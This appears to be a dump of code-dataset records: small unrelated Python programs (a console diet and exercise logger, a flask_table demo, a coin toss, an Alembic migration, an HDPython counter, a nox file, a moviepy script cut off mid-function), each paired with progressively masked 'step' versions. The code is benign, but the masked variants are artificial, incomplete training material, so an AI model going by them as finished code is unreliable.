"step-4": "import datetime\na = datetime.datetime.now()\nwhile True:\n print(\n \"\"\" Welcome to HMS\n 1. Are you want enter data\n 2. Are you want see record\n 3. exit\n \"\"\"\n )\n option = int(input('enter your option'))\n print(option)\n if option == 1:\n print(\n \"\"\" Select client name\n 1. Add Exercise\n 2. Add Dite\n 4. exit\n \"\"\"\n )\n option1 = int(input('enter your option'))\n if option1 == 1:\n print(\n \"\"\" 1. Aditya\n 2. harsh\n 3. shivam\n 4. exit\n \"\"\"\n )\n list = ['Aditya', 'harsh', 'shivam']\n option2 = int(input('enter your option'))\n option2 = option2 - 1\n name = list[option2]\n dec = input('enter the exercise name')\n f = open(name, 'a')\n decs = dec + '--' + str(a) + '\\n'\n f.write(decs)\n f.close()\n print('successfuly data enter')\n elif option1 == 2:\n print(\n \"\"\" 1. Aditya\n 2. harsh\n 3. shivam\n 4. exit\n \"\"\"\n )\n list = ['Aditya', 'harsh', 'shivam']\n option2 = int(input('enter your option'))\n option2 = option2 - 1\n name = list[option2]\n dec = input('enter the dite')\n f = open(name, 'a')\n decs = dec + '--' + str(a) + '\\n'\n f.write(decs)\n f.close()\n print('successfuly data enter')\n else:\n break\n elif option == 2:\n print(\n \"\"\" select name whose record you want see\n 1. Aditya\n 2. harsh\n 3. shivam\n 4. exit\n \"\"\"\n )\n list = ['Aditya', 'harsh', 'shivam']\n option3 = int(input('enter your option'))\n option3 = option3 - 1\n name = list[option3]\n f = open(name, 'rt')\n content = f.read()\n print(content)\n else:\n break\n",
"step-5": "import datetime\na = datetime.datetime.now()\nwhile True:\n print(\"\"\"\\\n Welcome to HMS\n 1. Are you want enter data\n 2. Are you want see record\n 3. exit\n \"\"\")\n option = int(input(\"enter your option\"))\n print(option)\n if option == 1:\n\n print(\"\"\"\\\n Select client name\n 1. Add Exercise\n 2. Add Dite\n 4. exit\n \"\"\")\n option1 =int(input(\"enter your option\"))\n if option1 == 1:\n print(\"\"\"\\\n 1. Aditya\n 2. harsh\n 3. shivam\n 4. exit\n \"\"\")\n list=['Aditya', 'harsh','shivam']\n option2 =int(input(\"enter your option\"))\n option2 = option2-1\n name = list[option2]\n dec = input(\"enter the exercise name\")\n f = open(name,\"a\")\n decs = dec+'--'+str(a)+'\\n'\n f.write(decs)\n f.close()\n print('successfuly data enter')\n elif option1 == 2:\n print(\"\"\"\\\n 1. Aditya\n 2. harsh\n 3. shivam\n 4. exit\n \"\"\")\n list=['Aditya', 'harsh','shivam']\n option2 =int(input(\"enter your option\"))\n option2 = option2-1\n name = list[option2]\n dec = input(\"enter the dite\")\n f = open(name,\"a\")\n decs = dec+'--'+str(a)+'\\n'\n f.write(decs)\n f.close()\n print('successfuly data enter') \n else:\n break \n elif option == 2:\n print(\"\"\"\\\n select name whose record you want see\n 1. Aditya\n 2. harsh\n 3. shivam\n 4. exit\n \"\"\")\n list=['Aditya', 'harsh','shivam']\n option3 =int(input(\"enter your option\"))\n option3 = option3-1\n name = list[option3]\n f = open(name,\"rt\")\n content =f.read() \n print(content) \n else:\n break\n\n\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from flask_table import Table, Col
"""Lets suppose that we have a class that we get an iterable of from
somewhere, such as a database. We can declare a table that pulls out
the relevant entries, escapes them and displays them.
"""
class Item(object):
def __init__(self, name, category):
self.name = name
self.category = category
class Category(object):
def __init__(self, name):
self.name = name
class ItemTable(Table):
name = Col('Name')
category_name = Col('Category', attr_list=['category', 'name'])
# Equivalently: Col('Category', attr='category.name')
# Both syntaxes are kept as the second is more readable, but
# doesn't cover all options. Such as if the items are dicts and
# the keys have dots in.
def main():
items = [Item('A', Category('catA')),
Item('B', Category('catB'))]
tab = ItemTable(items)
print(tab.__html__())
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "3191fa5f9c50993d17e12e4e2e9d56cfce2108e7",
"index": 5646,
"step-1": "<mask token>\n\n\nclass Item(object):\n\n def __init__(self, name, category):\n self.name = name\n self.category = category\n\n\nclass Category(object):\n\n def __init__(self, name):\n self.name = name\n\n\nclass ItemTable(Table):\n name = Col('Name')\n category_name = Col('Category', attr_list=['category', 'name'])\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Item(object):\n\n def __init__(self, name, category):\n self.name = name\n self.category = category\n\n\nclass Category(object):\n\n def __init__(self, name):\n self.name = name\n\n\nclass ItemTable(Table):\n name = Col('Name')\n category_name = Col('Category', attr_list=['category', 'name'])\n\n\ndef main():\n items = [Item('A', Category('catA')), Item('B', Category('catB'))]\n tab = ItemTable(items)\n print(tab.__html__())\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Item(object):\n\n def __init__(self, name, category):\n self.name = name\n self.category = category\n\n\nclass Category(object):\n\n def __init__(self, name):\n self.name = name\n\n\nclass ItemTable(Table):\n name = Col('Name')\n category_name = Col('Category', attr_list=['category', 'name'])\n\n\ndef main():\n items = [Item('A', Category('catA')), Item('B', Category('catB'))]\n tab = ItemTable(items)\n print(tab.__html__())\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from flask_table import Table, Col\n<mask token>\n\n\nclass Item(object):\n\n def __init__(self, name, category):\n self.name = name\n self.category = category\n\n\nclass Category(object):\n\n def __init__(self, name):\n self.name = name\n\n\nclass ItemTable(Table):\n name = Col('Name')\n category_name = Col('Category', attr_list=['category', 'name'])\n\n\ndef main():\n items = [Item('A', Category('catA')), Item('B', Category('catB'))]\n tab = ItemTable(items)\n print(tab.__html__())\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "from flask_table import Table, Col\n\n\n\"\"\"Lets suppose that we have a class that we get an iterable of from\nsomewhere, such as a database. We can declare a table that pulls out\nthe relevant entries, escapes them and displays them.\n\n\"\"\"\n\n\nclass Item(object):\n def __init__(self, name, category):\n self.name = name\n self.category = category\n\n\nclass Category(object):\n def __init__(self, name):\n self.name = name\n\n\nclass ItemTable(Table):\n name = Col('Name')\n category_name = Col('Category', attr_list=['category', 'name'])\n # Equivalently: Col('Category', attr='category.name')\n # Both syntaxes are kept as the second is more readable, but\n # doesn't cover all options. Such as if the items are dicts and\n # the keys have dots in.\n\n\ndef main():\n items = [Item('A', Category('catA')),\n Item('B', Category('catB'))]\n\n tab = ItemTable(items)\n print(tab.__html__())\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
6,
7,
8,
9,
10
]
}
|
[
6,
7,
8,
9,
10
] |
#-------------------------------------------------------------------------------
# Name: module1
# Purpose:
#
# Author: Nirvana
#
# Created: 07/06/2014
# Copyright: (c) Nirvana 2014
# Licence: <your licence>
#-------------------------------------------------------------------------------
import random
class Coin(object):
def __init__(self):
self.sideup = "Heads"
def toss(self):
if random.randint(0,1)==0:
self.sideup = "Heads"
else:
self.sideup = "Tails"
def get_sideup(self):
return self.sideup
mycoin=Coin()
print (mycoin.sideup)
print (mycoin.get_sideup())
mycoin.toss()
print (mycoin.get_sideup())
|
normal
|
{
"blob_id": "eb246beb05249f5dfde019b773698ba3bb1b1118",
"index": 544,
"step-1": "<mask token>\n\n\nclass Coin(object):\n\n def __init__(self):\n self.sideup = 'Heads'\n\n def toss(self):\n if random.randint(0, 1) == 0:\n self.sideup = 'Heads'\n else:\n self.sideup = 'Tails'\n\n def get_sideup(self):\n return self.sideup\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Coin(object):\n\n def __init__(self):\n self.sideup = 'Heads'\n\n def toss(self):\n if random.randint(0, 1) == 0:\n self.sideup = 'Heads'\n else:\n self.sideup = 'Tails'\n\n def get_sideup(self):\n return self.sideup\n\n\n<mask token>\nprint(mycoin.sideup)\nprint(mycoin.get_sideup())\nmycoin.toss()\nprint(mycoin.get_sideup())\n",
"step-3": "<mask token>\n\n\nclass Coin(object):\n\n def __init__(self):\n self.sideup = 'Heads'\n\n def toss(self):\n if random.randint(0, 1) == 0:\n self.sideup = 'Heads'\n else:\n self.sideup = 'Tails'\n\n def get_sideup(self):\n return self.sideup\n\n\nmycoin = Coin()\nprint(mycoin.sideup)\nprint(mycoin.get_sideup())\nmycoin.toss()\nprint(mycoin.get_sideup())\n",
"step-4": "import random\n\n\nclass Coin(object):\n\n def __init__(self):\n self.sideup = 'Heads'\n\n def toss(self):\n if random.randint(0, 1) == 0:\n self.sideup = 'Heads'\n else:\n self.sideup = 'Tails'\n\n def get_sideup(self):\n return self.sideup\n\n\nmycoin = Coin()\nprint(mycoin.sideup)\nprint(mycoin.get_sideup())\nmycoin.toss()\nprint(mycoin.get_sideup())\n",
"step-5": "#-------------------------------------------------------------------------------\n# Name: module1\n# Purpose:\n#\n# Author: Nirvana\n#\n# Created: 07/06/2014\n# Copyright: (c) Nirvana 2014\n# Licence: <your licence>\n#-------------------------------------------------------------------------------\n\nimport random\n\nclass Coin(object):\n def __init__(self):\n self.sideup = \"Heads\"\n\n def toss(self):\n if random.randint(0,1)==0:\n self.sideup = \"Heads\"\n else:\n self.sideup = \"Tails\"\n\n def get_sideup(self):\n return self.sideup\n\nmycoin=Coin()\nprint (mycoin.sideup)\nprint (mycoin.get_sideup())\nmycoin.toss()\nprint (mycoin.get_sideup())\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
"""Changed Views table name
Revision ID: 7f559bb24ca4
Revises: cc927fe47c8f
Create Date: 2021-08-20 23:20:31.959984
"""
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = "7f559bb24ca4"
down_revision = "cc927fe47c8f"
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table(
"views",
sa.Column("id", sa.Integer(), autoincrement=True, nullable=False),
sa.Column("url_id", sa.String(length=31), nullable=True),
sa.ForeignKeyConstraint(
["url_id"],
["urls.id"],
),
sa.PrimaryKeyConstraint("id"),
)
op.drop_table("view")
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table(
"view",
sa.Column("id", sa.INTEGER(), nullable=False),
sa.Column("url_id", sa.VARCHAR(length=31), nullable=True),
sa.ForeignKeyConstraint(
["url_id"],
["urls.id"],
),
sa.PrimaryKeyConstraint("id"),
)
op.drop_table("views")
# ### end Alembic commands ###
|
normal
|
{
"blob_id": "fd2b60de2ef540264855f04e1c5bcb9d1cf23c51",
"index": 9561,
"step-1": "<mask token>\n\n\ndef upgrade():\n op.create_table('views', sa.Column('id', sa.Integer(), autoincrement=\n True, nullable=False), sa.Column('url_id', sa.String(length=31),\n nullable=True), sa.ForeignKeyConstraint(['url_id'], ['urls.id']),\n sa.PrimaryKeyConstraint('id'))\n op.drop_table('view')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef upgrade():\n op.create_table('views', sa.Column('id', sa.Integer(), autoincrement=\n True, nullable=False), sa.Column('url_id', sa.String(length=31),\n nullable=True), sa.ForeignKeyConstraint(['url_id'], ['urls.id']),\n sa.PrimaryKeyConstraint('id'))\n op.drop_table('view')\n\n\ndef downgrade():\n op.create_table('view', sa.Column('id', sa.INTEGER(), nullable=False),\n sa.Column('url_id', sa.VARCHAR(length=31), nullable=True), sa.\n ForeignKeyConstraint(['url_id'], ['urls.id']), sa.\n PrimaryKeyConstraint('id'))\n op.drop_table('views')\n",
"step-3": "<mask token>\nrevision = '7f559bb24ca4'\ndown_revision = 'cc927fe47c8f'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_table('views', sa.Column('id', sa.Integer(), autoincrement=\n True, nullable=False), sa.Column('url_id', sa.String(length=31),\n nullable=True), sa.ForeignKeyConstraint(['url_id'], ['urls.id']),\n sa.PrimaryKeyConstraint('id'))\n op.drop_table('view')\n\n\ndef downgrade():\n op.create_table('view', sa.Column('id', sa.INTEGER(), nullable=False),\n sa.Column('url_id', sa.VARCHAR(length=31), nullable=True), sa.\n ForeignKeyConstraint(['url_id'], ['urls.id']), sa.\n PrimaryKeyConstraint('id'))\n op.drop_table('views')\n",
"step-4": "<mask token>\nimport sqlalchemy as sa\nfrom alembic import op\nrevision = '7f559bb24ca4'\ndown_revision = 'cc927fe47c8f'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_table('views', sa.Column('id', sa.Integer(), autoincrement=\n True, nullable=False), sa.Column('url_id', sa.String(length=31),\n nullable=True), sa.ForeignKeyConstraint(['url_id'], ['urls.id']),\n sa.PrimaryKeyConstraint('id'))\n op.drop_table('view')\n\n\ndef downgrade():\n op.create_table('view', sa.Column('id', sa.INTEGER(), nullable=False),\n sa.Column('url_id', sa.VARCHAR(length=31), nullable=True), sa.\n ForeignKeyConstraint(['url_id'], ['urls.id']), sa.\n PrimaryKeyConstraint('id'))\n op.drop_table('views')\n",
"step-5": "\"\"\"Changed Views table name\n\nRevision ID: 7f559bb24ca4\nRevises: cc927fe47c8f\nCreate Date: 2021-08-20 23:20:31.959984\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"7f559bb24ca4\"\ndown_revision = \"cc927fe47c8f\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table(\n \"views\",\n sa.Column(\"id\", sa.Integer(), autoincrement=True, nullable=False),\n sa.Column(\"url_id\", sa.String(length=31), nullable=True),\n sa.ForeignKeyConstraint(\n [\"url_id\"],\n [\"urls.id\"],\n ),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.drop_table(\"view\")\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table(\n \"view\",\n sa.Column(\"id\", sa.INTEGER(), nullable=False),\n sa.Column(\"url_id\", sa.VARCHAR(length=31), nullable=True),\n sa.ForeignKeyConstraint(\n [\"url_id\"],\n [\"urls.id\"],\n ),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.drop_table(\"views\")\n # ### end Alembic commands ###\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from HDPython import *
import HDPython.examples as ahe
from enum import Enum, auto
class counter_state(Enum):
idle = auto()
running = auto()
done = auto()
class Counter_cl(v_class_master):
def __init__(self):
super().__init__()
self.counter = v_variable(v_slv(32))
self.counter_max = v_variable(v_slv(32))
self.state = v_variable(v_enum(counter_state.idle))
def _onPull(self):
if self.state == counter_state.running:
self.counter << self.counter + 1
def count_to_max(self, maxValue):
if self.state == counter_state.idle:
self.counter << 0
self.counter_max << maxValue
self.state << counter_state.running
def isDone(self):
return self.state == counter_state.done
def reset(self):
if self.state == counter_state.done:
self.state << counter_state.idle
class my_first_test_bench(v_entity):
def __init__(self):
super().__init__()
self.architecture()
@architecture
def architecture(self):
counter = v_variable(v_slv(32))
max_cnt = v_variable(v_slv(32,300))
clkgen = v_create(ahe.clk_generator())
cnt = Counter_cl()
@rising_edge(clkgen.clk)
def proc():
counter << counter + 1
cnt.count_to_max(max_cnt)
if cnt.isDone():
cnt.reset()
end_architecture()
my_first_instance = v_create(my_first_test_bench())
convert_to_hdl(my_first_instance, "myFirst")
|
normal
|
{
"blob_id": "046db03b146ce0182ba7889908f536a09de051d5",
"index": 5069,
"step-1": "<mask token>\n\n\nclass Counter_cl(v_class_master):\n\n def __init__(self):\n super().__init__()\n self.counter = v_variable(v_slv(32))\n self.counter_max = v_variable(v_slv(32))\n self.state = v_variable(v_enum(counter_state.idle))\n\n def _onPull(self):\n if self.state == counter_state.running:\n self.counter << self.counter + 1\n <mask token>\n\n def isDone(self):\n return self.state == counter_state.done\n <mask token>\n\n\nclass my_first_test_bench(v_entity):\n\n def __init__(self):\n super().__init__()\n self.architecture()\n\n @architecture\n def architecture(self):\n counter = v_variable(v_slv(32))\n max_cnt = v_variable(v_slv(32, 300))\n clkgen = v_create(ahe.clk_generator())\n cnt = Counter_cl()\n\n @rising_edge(clkgen.clk)\n def proc():\n counter << counter + 1\n cnt.count_to_max(max_cnt)\n if cnt.isDone():\n cnt.reset()\n end_architecture()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Counter_cl(v_class_master):\n\n def __init__(self):\n super().__init__()\n self.counter = v_variable(v_slv(32))\n self.counter_max = v_variable(v_slv(32))\n self.state = v_variable(v_enum(counter_state.idle))\n\n def _onPull(self):\n if self.state == counter_state.running:\n self.counter << self.counter + 1\n <mask token>\n\n def isDone(self):\n return self.state == counter_state.done\n\n def reset(self):\n if self.state == counter_state.done:\n self.state << counter_state.idle\n\n\nclass my_first_test_bench(v_entity):\n\n def __init__(self):\n super().__init__()\n self.architecture()\n\n @architecture\n def architecture(self):\n counter = v_variable(v_slv(32))\n max_cnt = v_variable(v_slv(32, 300))\n clkgen = v_create(ahe.clk_generator())\n cnt = Counter_cl()\n\n @rising_edge(clkgen.clk)\n def proc():\n counter << counter + 1\n cnt.count_to_max(max_cnt)\n if cnt.isDone():\n cnt.reset()\n end_architecture()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Counter_cl(v_class_master):\n\n def __init__(self):\n super().__init__()\n self.counter = v_variable(v_slv(32))\n self.counter_max = v_variable(v_slv(32))\n self.state = v_variable(v_enum(counter_state.idle))\n\n def _onPull(self):\n if self.state == counter_state.running:\n self.counter << self.counter + 1\n\n def count_to_max(self, maxValue):\n if self.state == counter_state.idle:\n self.counter << 0\n self.counter_max << maxValue\n self.state << counter_state.running\n\n def isDone(self):\n return self.state == counter_state.done\n\n def reset(self):\n if self.state == counter_state.done:\n self.state << counter_state.idle\n\n\nclass my_first_test_bench(v_entity):\n\n def __init__(self):\n super().__init__()\n self.architecture()\n\n @architecture\n def architecture(self):\n counter = v_variable(v_slv(32))\n max_cnt = v_variable(v_slv(32, 300))\n clkgen = v_create(ahe.clk_generator())\n cnt = Counter_cl()\n\n @rising_edge(clkgen.clk)\n def proc():\n counter << counter + 1\n cnt.count_to_max(max_cnt)\n if cnt.isDone():\n cnt.reset()\n end_architecture()\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass counter_state(Enum):\n idle = auto()\n running = auto()\n done = auto()\n\n\nclass Counter_cl(v_class_master):\n\n def __init__(self):\n super().__init__()\n self.counter = v_variable(v_slv(32))\n self.counter_max = v_variable(v_slv(32))\n self.state = v_variable(v_enum(counter_state.idle))\n\n def _onPull(self):\n if self.state == counter_state.running:\n self.counter << self.counter + 1\n\n def count_to_max(self, maxValue):\n if self.state == counter_state.idle:\n self.counter << 0\n self.counter_max << maxValue\n self.state << counter_state.running\n\n def isDone(self):\n return self.state == counter_state.done\n\n def reset(self):\n if self.state == counter_state.done:\n self.state << counter_state.idle\n\n\nclass my_first_test_bench(v_entity):\n\n def __init__(self):\n super().__init__()\n self.architecture()\n\n @architecture\n def architecture(self):\n counter = v_variable(v_slv(32))\n max_cnt = v_variable(v_slv(32, 300))\n clkgen = v_create(ahe.clk_generator())\n cnt = Counter_cl()\n\n @rising_edge(clkgen.clk)\n def proc():\n counter << counter + 1\n cnt.count_to_max(max_cnt)\n if cnt.isDone():\n cnt.reset()\n end_architecture()\n\n\n<mask token>\nconvert_to_hdl(my_first_instance, 'myFirst')\n",
"step-5": "from HDPython import *\nimport HDPython.examples as ahe\nfrom enum import Enum, auto\n\nclass counter_state(Enum):\n idle = auto()\n running = auto()\n done = auto()\n\nclass Counter_cl(v_class_master):\n def __init__(self):\n super().__init__()\n self.counter = v_variable(v_slv(32))\n self.counter_max = v_variable(v_slv(32))\n self.state = v_variable(v_enum(counter_state.idle))\n\n def _onPull(self):\n if self.state == counter_state.running:\n self.counter << self.counter + 1\n\n def count_to_max(self, maxValue):\n if self.state == counter_state.idle:\n self.counter << 0 \n self.counter_max << maxValue\n self.state << counter_state.running\n\n def isDone(self):\n return self.state == counter_state.done\n\n def reset(self):\n if self.state == counter_state.done:\n self.state << counter_state.idle\n\nclass my_first_test_bench(v_entity):\n def __init__(self):\n super().__init__()\n self.architecture()\n\n\n @architecture\n def architecture(self):\n counter = v_variable(v_slv(32))\n max_cnt = v_variable(v_slv(32,300))\n\n\n clkgen = v_create(ahe.clk_generator())\n\n cnt = Counter_cl()\n\n\n\n @rising_edge(clkgen.clk)\n def proc():\n counter << counter + 1\n cnt.count_to_max(max_cnt)\n if cnt.isDone():\n cnt.reset()\n\n \n\n end_architecture()\n\n\nmy_first_instance = v_create(my_first_test_bench())\n\nconvert_to_hdl(my_first_instance, \"myFirst\")",
"step-ids": [
7,
8,
9,
12,
15
]
}
|
[
7,
8,
9,
12,
15
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@nox.session(python=['3.9', '3.8', '3.7', '3.6'], venv_backend='conda',
venv_params=['--use-local'])
def test(session):
"""Add tests
"""
session.install()
session.run('pytest')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@nox.session(python=['3.9', '3.8', '3.7', '3.6'], venv_backend='conda',
venv_params=['--use-local'])
def test(session):
"""Add tests
"""
session.install()
session.run('pytest')
@nox.session(python=['3.9', '3.8', '3.7', '3.6'])
def lint(session):
"""Lint the code with flake8.
"""
session.install('flake8')
session.run('flake8', '')
<|reserved_special_token_1|>
import nox
@nox.session(python=['3.9', '3.8', '3.7', '3.6'], venv_backend='conda',
venv_params=['--use-local'])
def test(session):
"""Add tests
"""
session.install()
session.run('pytest')
@nox.session(python=['3.9', '3.8', '3.7', '3.6'])
def lint(session):
"""Lint the code with flake8.
"""
session.install('flake8')
session.run('flake8', '')
<|reserved_special_token_1|>
import nox
@nox.session(python=["3.9", "3.8", "3.7", "3.6"], venv_backend="conda", venv_params=["--use-local"])
def test(session):
"""Add tests
"""
session.install()
session.run("pytest")
@nox.session(python=["3.9", "3.8", "3.7", "3.6"])
def lint(session):
"""Lint the code with flake8.
"""
session.install("flake8")
session.run("flake8", "")
|
flexible
|
{
"blob_id": "9aecf297ed36784d69e2be6fada31f7c1ac37500",
"index": 4778,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\n@nox.session(python=['3.9', '3.8', '3.7', '3.6'], venv_backend='conda',\n venv_params=['--use-local'])\ndef test(session):\n \"\"\"Add tests\n \"\"\"\n session.install()\n session.run('pytest')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\n@nox.session(python=['3.9', '3.8', '3.7', '3.6'], venv_backend='conda',\n venv_params=['--use-local'])\ndef test(session):\n \"\"\"Add tests\n \"\"\"\n session.install()\n session.run('pytest')\n\n\n@nox.session(python=['3.9', '3.8', '3.7', '3.6'])\ndef lint(session):\n \"\"\"Lint the code with flake8.\n \"\"\"\n session.install('flake8')\n session.run('flake8', '')\n",
"step-4": "import nox\n\n\n@nox.session(python=['3.9', '3.8', '3.7', '3.6'], venv_backend='conda',\n venv_params=['--use-local'])\ndef test(session):\n \"\"\"Add tests\n \"\"\"\n session.install()\n session.run('pytest')\n\n\n@nox.session(python=['3.9', '3.8', '3.7', '3.6'])\ndef lint(session):\n \"\"\"Lint the code with flake8.\n \"\"\"\n session.install('flake8')\n session.run('flake8', '')\n",
"step-5": "import nox\n\n@nox.session(python=[\"3.9\", \"3.8\", \"3.7\", \"3.6\"], venv_backend=\"conda\", venv_params=[\"--use-local\"])\ndef test(session):\n \"\"\"Add tests\n \"\"\"\n session.install()\n session.run(\"pytest\")\n\n@nox.session(python=[\"3.9\", \"3.8\", \"3.7\", \"3.6\"])\ndef lint(session):\n \"\"\"Lint the code with flake8.\n \"\"\"\n session.install(\"flake8\")\n session.run(\"flake8\", \"\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#-*- coding: utf-8 -*-
s = "123"
try:
print(int(s) + 1)
print(int(s) / 1)
except ValueError as ve:
print("ValueError occurs!!!", ve)
except ZeroDivisionError as e:
print("ValueError occurs!!!", e)
except :
print("Error occurs!!!")
else:
print("elseeeeeeeeeeeeeee")
finally:
print("ABCDEFG")
# try:
# # 예외 발생 가능 코드들
# except:
# # 예외시 처리될 구문
# except:
# pass #씹겠다?!
# else:
# #예외가 없을 경우 실행되는 부분
# finally:
# #예외가 있던 없던 실행되는 부분
|
normal
|
{
"blob_id": "1bf79319613ca1454f3a9ed21068bd899616395c",
"index": 624,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ntry:\n print(int(s) + 1)\n print(int(s) / 1)\nexcept ValueError as ve:\n print('ValueError occurs!!!', ve)\nexcept ZeroDivisionError as e:\n print('ValueError occurs!!!', e)\nexcept:\n print('Error occurs!!!')\nelse:\n print('elseeeeeeeeeeeeeee')\nfinally:\n print('ABCDEFG')\n",
"step-3": "s = '123'\ntry:\n print(int(s) + 1)\n print(int(s) / 1)\nexcept ValueError as ve:\n print('ValueError occurs!!!', ve)\nexcept ZeroDivisionError as e:\n print('ValueError occurs!!!', e)\nexcept:\n print('Error occurs!!!')\nelse:\n print('elseeeeeeeeeeeeeee')\nfinally:\n print('ABCDEFG')\n",
"step-4": "#-*- coding: utf-8 -*-\ns = \"123\"\n\ntry:\n print(int(s) + 1)\n print(int(s) / 1)\n\nexcept ValueError as ve:\n print(\"ValueError occurs!!!\", ve)\n\nexcept ZeroDivisionError as e:\n print(\"ValueError occurs!!!\", e)\n\nexcept :\n print(\"Error occurs!!!\")\n\nelse:\n print(\"elseeeeeeeeeeeeeee\")\n\nfinally:\n print(\"ABCDEFG\")\n\n# try:\n# # 예외 발생 가능 코드들\n# except:\n# # 예외시 처리될 구문\n# except:\n# pass #씹겠다?!\n# else:\n# #예외가 없을 경우 실행되는 부분\n\n# finally:\n# #예외가 있던 없던 실행되는 부분",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
class Vehicle(object):
count_list = []
def __init__(self, registration_number):
self.registration_number = registration_number
Vehicle.count_list.append(self)
Vehicle.count = len(Vehicle.count_list)
|
normal
|
{
"blob_id": "8b9336113f64a88eeabe6e45021938fac9efd1c6",
"index": 6442,
"step-1": "<mask token>\n",
"step-2": "class Vehicle(object):\n <mask token>\n <mask token>\n",
"step-3": "class Vehicle(object):\n <mask token>\n\n def __init__(self, registration_number):\n self.registration_number = registration_number\n Vehicle.count_list.append(self)\n Vehicle.count = len(Vehicle.count_list)\n",
"step-4": "class Vehicle(object):\n count_list = []\n\n def __init__(self, registration_number):\n self.registration_number = registration_number\n Vehicle.count_list.append(self)\n Vehicle.count = len(Vehicle.count_list)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import argparse
import glob
import importlib
import inspect
import math
import os
import re
import subprocess
import sys
import moviepy.audio.fx.all as afx
import moviepy.video.fx.all as vfx
import numpy as np
from _appmanager import get_executable
from _shutil import format_time, get_time_str, getch, print2
from moviepy.config import change_settings
from moviepy.editor import *
from open_with.open_with import open_with
import codeapi
import core
import coreapi
import datastruct
SCRIPT_ROOT = os.path.dirname(os.path.abspath(__file__))
ignore_undefined = False
if 1:
change_settings({"FFMPEG_BINARY": get_executable("ffmpeg")})
# def _get_markers(file):
# marker_file = file + ".marker.txt"
# if os.path.exists(marker_file):
# with open(marker_file, "r") as f:
# s = f.read()
# return [float(x) for x in s.split()]
# else:
# return None
# def _load_and_expand_img(f):
# fg = Image.open(f).convert("RGBA")
# bg = Image.new("RGB", (1920, 1080))
# bg.paste(fg, ((bg.width - fg.width) // 2, (bg.height - fg.height) // 2), fg)
# return np.array(bg)
def _update_mpy_clip(
clip, subclip, speed, frame, norm, loop, duration, pos, scale, vol, **kwargs,
):
assert duration is not None
# video clip operations / fx
if subclip is not None:
if isinstance(subclip, (int, float)):
clip = clip.subclip(subclip).set_duration(duration)
else:
subclip_duration = subclip[1] - subclip[0]
if duration > subclip_duration:
c1 = clip.subclip(subclip[0], subclip[1])
c2 = clip.to_ImageClip(subclip[1]).set_duration(
duration - subclip_duration
)
clip = concatenate_videoclips([c1, c2])
# HACK: workaround for a bug: 'CompositeAudioClip' object has no attribute 'fps'
if clip.audio is not None:
clip = clip.set_audio(clip.audio.set_fps(44100))
else:
clip = clip.subclip(subclip[0], subclip[1]).set_duration(duration)
if speed is not None:
clip = clip.fx(
# pylint: disable=maybe-no-member
vfx.speedx,
speed,
)
if frame is not None:
clip = clip.to_ImageClip(frame).set_duration(duration)
# Loop or change duration
if loop:
clip = clip.fx(
# pylint: disable=maybe-no-member
vfx.loop
)
if subclip is None:
clip = clip.set_duration(duration)
if pos is not None:
# (x, y) marks the center location of the of the clip instead of the top
# left corner.
if pos == "center":
clip = clip.set_position(("center", "center"))
elif isinstance(pos, (list, tuple)):
pos = list(pos)
half_size = [x // 2 for x in clip.size]
for i in range(2):
if isinstance(pos[i], (int, float)):
pos[i] = pos[i] - half_size[i]
pos[i] = int(coreapi.global_scale * pos[i])
clip = clip.set_position(pos)
else:
clip = clip.set_position(pos)
if scale[0] != 1.0 or scale[1] != 1.0:
clip = clip.resize((int(clip.w * scale[0]), int(clip.h * scale[1])))
return clip
def _update_clip_duration(track):
def is_connected(prev_clip, cur_clip):
return math.isclose(
prev_clip.start + prev_clip.duration, cur_clip.start, rel_tol=1e-3,
)
prev_clip_info = None
for clip_info in track:
if prev_clip_info is not None:
if prev_clip_info.auto_extend:
prev_clip_info.duration = clip_info.start - prev_clip_info.start
prev_clip_info.auto_extend = False
assert prev_clip_info.duration > 0
# Apply fadeout to previous clip if it's not connected with
# current clip.
if prev_clip_info.crossfade > 0 and not is_connected(
prev_clip_info, clip_info
):
prev_clip_info.fadeout = prev_clip_info.crossfade
prev_clip_info = clip_info
# Update last clip duration
if prev_clip_info is not None:
if prev_clip_info.auto_extend:
duration = prev_clip_info.duration
# Extend the last video clip to match the voice track
if "re" in coreapi.pos_dict:
